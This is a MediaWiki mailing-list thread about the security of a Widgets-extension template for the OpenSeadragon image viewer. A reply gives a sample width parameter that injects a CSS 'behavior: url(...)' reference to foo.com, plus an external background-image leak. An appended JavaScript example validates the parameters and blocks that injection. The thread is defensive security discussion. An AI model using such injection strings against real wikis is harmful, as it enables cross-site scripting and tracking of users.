On Sat, Oct 29, 2016 at 3:40 PM, Brian Wolff <bawo...@gmail.com> wrote:
> On Sat, Oct 29, 2016 at 2:50 PM, Dr. Michael Bonert
> <mich...@librepathology.org> wrote:
>> Hello,
>>
>> I was wondering about the security of Widgets (
>> https://www.mediawiki.org/wiki/Extension:Widgets ) that get parameters
>> passed to them. Any thoughts?
>>
>> Are the parameters passed through to the widget cleansed of html/scripts?
>> If it isn't -- is it possible to easily enforce typing/boundaries on the
>> parameters?
>>
>> Generally speaking, I am looking for a discussion around security &
>> widgets.
>>
>> A widget I created (below) takes three parameters (width, height, filename)
>> and feeds those to OpenSeadragon( https://openseadragon.github.io /
>> https://en.wikipedia.org/wiki/Seadragon_Software ). It works on a testing
>> server.
>>
>> OpenSeadragon was discussed in brainstorming in 2015 -
>> https://www.mediawiki.org/wiki/Reading/Quarterly_Brainstorming
>>
>> My interest in this is virtual (microscopic) slides (e.g.
>> http://openslide.org/demo/ ) which are often
>> several gigabytes of data each.
>>
>> Thanks,
>> Michael
>>
>> ------------------------
>> Widget code...
>>
>> Create page: Widget:OpenSeadragon
>> ---------------------------------------------------------------------
>> <noinclude>__NOTOC__
>> <!-- Copyright (c) 2016 Michael Bonert -->
>> <!-- Released under GNU General Public Licence - Version 3; see
>> http://www.gnu.org/licenses/gpl.html -->
>> To insert this widget, use the following code:
>>
>> <nowiki>{{#widget:</nowiki>{{PAGENAME}}<nowiki>
>> |image=12881.dzi
>> |width=800
>> |height=600
>> }}</nowiki>
>>
>>
>> </noinclude>
>> <includeonly><!-- This inserts an OpenSeadragon image -->
>> <div id="openseadragon1" style="width:
>> <!--{$width|default:400|escape:'html'}-->px; height:
>> <!--{$height|default:300|escape:'html'}-->px;"></div>
>> <script src="../../openseadragon/openseadragon.min.js"></script>
>> <script type="text/javascript">
>>     var viewer = OpenSeadragon({
>>         id: "openseadragon1",
>>         prefixUrl: "../../openseadragon/images/",
>>         tileSources: "../../vslide/<!--{$image|escape:'urlpathinfo'}-->"
>>     });
>> </script>
>> </includeonly>
>> -------------------------------------------------
>>
>
> In theory that's what the escape modifier is for in smarty parameters.
>
> However, in this example, <!--{$width|default:400|escape:'html'}-->px;
> inside a style attribute isn't really sufficient, as a user could set
> a width parameter like "400; behavior: url(
> 'https://foo.com/bar.htc#baz' );x: ", which would cause javascript
> execution on IE9 and older. (There are other properties for other
> browsers, however mostly affecting only older browsers). You could
> also leak private info about your users by doing something like
> background-image: url( "http://external.com/foo.png"; ) .
>
> [Disclaimer: I have not read the source code of the widgets extension,
> so there could also potentially be generic security issues with the
> extension. Since I haven't reviewed it, I don't really know].
>
> --
> bawolff

Just as a p.s. I just poked around mediawikiwidgets.com. I looked at
three widgets at random - all 3 had XSS vulnerabilities. Now of
course, 3 is a very small sample size, so it may have been luck of the
draw. Nevertheless, I'd like to take this moment to urge anyone using
a widget made by someone else to review it carefully before use as
many widgets are insecure.

--
bawolff
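As an added example (not code from the thread or from the Widgets extension), the check Michael asked about: integer typing and bounds on width/height and a filename whitelist for image, beside a small model of why escape:'html' leaves the style-attribute injection Brian describes intact (the HTML parser entity-decodes attribute values before CSS ever parses them). All function names here are assumptions.

```javascript
// Added example (not code from the thread or the Widgets extension).
// Shows why escape:'html' on $width is a no-op from CSS's point of view and
// how to enforce typing/bounds instead. Assumed names: escapeHtml,
// decodeAttr, parseDimension, parseImageName, buildStyle.

// Same five characters htmlspecialchars(ENT_QUOTES) touches.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// What the HTML parser does to an attribute value before CSS sees it:
// entities are decoded, so the escaped text round-trips to the original.
function decodeAttr(s) {
  const map = { "&amp;": "&", "&lt;": "<", "&gt;": ">", "&quot;": '"', "&#039;": "'" };
  return String(s).replace(/&(amp|lt|gt|quot|#039);/g, (m) => map[m]);
}

// width/height: digits only and within bounds; null means "reject".
function parseDimension(value, fallback, min = 1, max = 4096) {
  if (value === undefined || value === "") return fallback;
  if (!/^\d{1,4}$/.test(String(value))) return null;
  const n = Number(value);
  return n >= min && n <= max ? n : null;
}

// image: a bare .dzi filename, no path separators, no query string.
function parseImageName(value) {
  return /^[A-Za-z0-9_-]{1,64}\.dzi$/.test(String(value)) ? String(value) : null;
}

// The style attribute is built only from validated integers, so it can
// never contain anything but the two declarations we intend.
function buildStyle(params) {
  const width = parseDimension(params.width, 400);
  const height = parseDimension(params.height, 300);
  if (width === null || height === null) return null;
  return `width: ${width}px; height: ${height}px;`;
}

// Constructed inputs: a benign call and the injection shape quoted in the thread.
const benign = { width: "800", height: "600", image: "12881.dzi" };
const hostile = { width: "400; behavior: url('https://foo.com/bar.htc#baz');x: ", height: "600" };

console.log(buildStyle(benign));   // width: 800px; height: 600px;
console.log(buildStyle(hostile));  // null
console.log(decodeAttr(escapeHtml(hostile.width)) === hostile.width); // true
```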

_______________________________________________
MediaWiki-l mailing list
To unsubscribe, go to:
https://lists.wikimedia.org/mailman/listinfo/mediawiki-l